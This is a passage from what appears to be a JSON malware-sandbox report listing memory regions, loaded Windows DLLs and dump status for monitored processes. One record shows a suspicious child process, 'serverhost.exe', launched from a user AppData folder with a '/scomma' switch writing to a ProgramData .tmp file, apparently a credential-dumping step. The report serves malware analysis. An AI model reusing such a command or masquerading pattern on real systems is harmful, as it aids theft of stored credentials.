"filename": "\\Windows\\System32\\normaliz.dll", "id": "region_1770", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 1971912704, "timestamp": "00:01:21.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1925185536, "type": "region", "version": 1 }, "end_va": 1925521407, "entry_point": 1925190846, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_1771", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1925185536, "timestamp": "00:01:21.672", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1925054464, "type": "region", "version": 1 }, "end_va": 1925140479, "entry_point": 1925059294, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_1772", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1925054464, "timestamp": "00:01:21.673", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1933246464, "type": "region", "version": 1 }, "end_va": 1933299711, "entry_point": 1933251366, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_1773", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1933246464, "timestamp": "00:01:21.674", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001774-addr_0x0000000001bc0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_295", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 29102079, "entry_point": 0, "filename": null, "id": "region_1774", "name": "private_0x0000000001bc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29097984, "timestamp": "00:01:21.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 29102079, "entry_point": 0, "filename": null, "id": "region_1775", "name": "pagefile_0x0000000001bc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29097984, "timestamp": "00:01:21.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1912864768, "type": "region", "version": 1 }, "end_va": 1912889343, "entry_point": 1912869466, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_1776", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1912864768, "timestamp": "00:01:21.684", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1954480128, "type": "region", "version": 1 }, "end_va": 1954545663, "entry_point": 1954494657, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_1777", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1954480128, "timestamp": "00:01:21.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001778-addr_0x0000000001cb0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_296", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30605311, "entry_point": 0, "filename": null, "id": "region_1778", "name": "private_0x0000000001cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30081024, "timestamp": "00:01:21.690", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001779-addr_0x0000000001cb0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_297", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30343167, "entry_point": 0, "filename": null, "id": "region_1779", "name": "private_0x0000000001cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30081024, "timestamp": "00:01:21.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 30539776, "type": "region", "version": 1 }, "end_va": 30605311, "entry_point": 0, "filename": null, "id": "region_1780", "name": "private_0x0000000001d20000", "norm_filename": null, "region_type": "private_memory", "start_va": 30539776, "timestamp": "00:01:21.691", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001781-addr_0x0000000001cb0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_298", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_1781", "name": "private_0x0000000001cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30081024, "timestamp": "00:01:21.692", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30343167, "entry_point": 0, "filename": null, "id": "region_1782", "name": "private_0x0000000001ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30277632, "timestamp": "00:01:21.692", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 35454976, "type": "region", "version": 1 }, "end_va": 36503551, "entry_point": 0, "filename": null, "id": "region_1783", "name": "private_0x00000000021d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35454976, "timestamp": "00:01:21.696", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_1784", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:01:21.696", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36896768, "type": "region", "version": 1 }, "end_va": 37945343, "entry_point": 0, "filename": null, "id": "region_1785", "name": "private_0x0000000002330000", "norm_filename": null, "region_type": "private_memory", "start_va": 36896768, "timestamp": "00:01:21.697", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_1786", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:01:21.697", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1870659584, "type": "region", "version": 1 }, "end_va": 1870684159, "entry_point": 1870664882, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_1787", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1870659584, "timestamp": "00:01:21.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30081024, "type": "region", "version": 1 }, "end_va": 30085119, "entry_point": 0, "filename": null, "id": "region_1788", "name": "pagefile_0x0000000001cb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30081024, "timestamp": "00:01:21.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 33226751, "entry_point": 0, "filename": null, "id": "region_1789", "name": "private_0x0000000001eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32178176, "timestamp": "00:01:21.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 33357824, "type": "region", "version": 1 }, "end_va": 33619967, "entry_point": 0, "filename": null, "id": "region_1790", "name": "private_0x0000000001fd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33357824, "timestamp": "00:01:21.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38666240, "type": "region", "version": 1 }, "end_va": 39714815, "entry_point": 0, "filename": null, "id": "region_1791", "name": "private_0x00000000024e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38666240, "timestamp": "00:01:21.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1987522559, "entry_point": 1986995154, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1792", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:01:21.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_1793", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:01:21.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 30146560, "type": "region", "version": 1 }, "end_va": 30150655, "entry_point": 0, "filename": null, "id": "region_1794", "name": "pagefile_0x0000000001cc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30146560, "timestamp": "00:01:21.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 368640, "start_va": 1871183872, "type": "region", "version": 1 }, "end_va": 1871552511, "entry_point": 1871191861, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_1795", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 1871183872, "timestamp": "00:01:21.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1966997504, "type": "region", "version": 1 }, "end_va": 1967054847, "entry_point": 1967002165, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_1796", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1966997504, "timestamp": "00:01:21.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 41615360, "type": "region", "version": 1 }, "end_va": 42663935, "entry_point": 0, "filename": null, "id": "region_1797", "name": "private_0x00000000027b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41615360, "timestamp": "00:01:21.730", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1852178432, "type": "region", "version": 1 }, "end_va": 1852211199, "entry_point": 1852189862, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_1798", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 1852178432, "timestamp": "00:01:21.730", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1935474688, "type": "region", "version": 1 }, "end_va": 1935540223, "entry_point": 1935480102, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_1799", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1935474688, "timestamp": "00:01:21.730", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_1800", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:01:21.731", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1935343616, "type": "region", "version": 1 }, "end_va": 1935417343, "entry_point": 1935350002, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_1801", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1935343616, "timestamp": "00:01:21.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961279487, "entry_point": 1961038941, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_1802", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:01:21.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1935278080, "type": "region", "version": 1 }, "end_va": 1935310847, "entry_point": 1935282974, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_1803", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1935278080, "timestamp": "00:01:21.738", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956466687, "entry_point": 1956451807, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_1804", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:21.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1965490176, "type": "region", "version": 1 }, "end_va": 1965514751, "entry_point": 1965495923, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_1805", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 1965490176, "timestamp": "00:01:21.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1945763840, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945803022, "filename": "\\Windows\\System32\\FWPUCLNT.DLL", "id": "region_1806", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\system32\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1945763840, "timestamp": "00:01:21.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 155648, "start_va": 30343168, "type": "region", "version": 1 }, "end_va": 30498815, "entry_point": 0, "filename": null, "id": "region_1807", "name": "private_0x0000000001cf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30343168, "timestamp": "00:01:23.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 33619968, "type": "region", "version": 1 }, "end_va": 34668543, "entry_point": 0, "filename": null, "id": "region_1808", "name": "private_0x0000000002010000", "norm_filename": null, "region_type": "private_memory", "start_va": 33619968, "timestamp": "00:01:23.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34930687, "entry_point": 0, "filename": null, "id": "region_1809", "name": "private_0x0000000002110000", "norm_filename": null, "region_type": "private_memory", "start_va": 34668544, "timestamp": "00:01:23.313", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000011-region_00001810-addr_0x0000000002430000-size_0x00000000000a6000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_299", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 679936, "start_va": 37945344, "type": "region", "version": 1 }, "end_va": 38625279, "entry_point": 0, "filename": null, "id": "region_1810", "name": "private_0x0000000002430000", "norm_filename": null, "region_type": "private_memory", "start_va": 37945344, "timestamp": "00:01:23.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41091072, "type": "region", "version": 1 }, "end_va": 41353215, "entry_point": 0, "filename": null, "id": "region_1811", "name": "private_0x0000000002730000", "norm_filename": null, "region_type": "private_memory", "start_va": 41091072, "timestamp": "00:01:23.313", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C570.tmp\"", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "id": "proc_12", "image_name": "serverhost.exe", "monitor_reason": "child_process", "monitored_id": 12, "origin_monitor_id": 11, "ref_parent_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000012-region_00001832-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_300", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1832", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:25.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1833", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:25.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 0, "filename": null, "id": "region_1834", "name": "private_0x0000000000130000", "norm_filename": null, "region_type": "private_memory", "start_va": 1245184, "timestamp": "00:01:25.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4308991, "entry_point": 0, "filename": null, "id": "region_1835", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:25.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 12845056, "type": "region", "version": 1 }, "end_va": 12955647, "entry_point": 12852624, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exeMh.exe", "id": "region_1836", "name": "serverhost.exemh.exe", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exemh.exe", "region_type": "memory_mapped_file", "start_va": 12845056, "timestamp": "00:01:25.378", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1837", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:01:25.378", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1838", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:01:25.378", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1839", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:25.381", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1840", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:25.381", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1841", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:25.381", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1853", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:25.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 684031, "entry_point": 262144, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1854", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:25.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 3112959, "entry_point": 0, "filename": null, "id": "region_1855", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:01:25.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_1856", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:01:25.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 6422527, "entry_point": 0, "filename": null, "id": "region_1857", "name": "private_0x0000000000520000", "norm_filename": null, "region_type": "private_memory", "start_va": 5373952, "timestamp": "00:01:25.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1857355776, "type": "region", "version": 1 }, "end_va": 1857896447, "entry_point": 1857362345, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1858", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1857355776, "timestamp": "00:01:25.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": 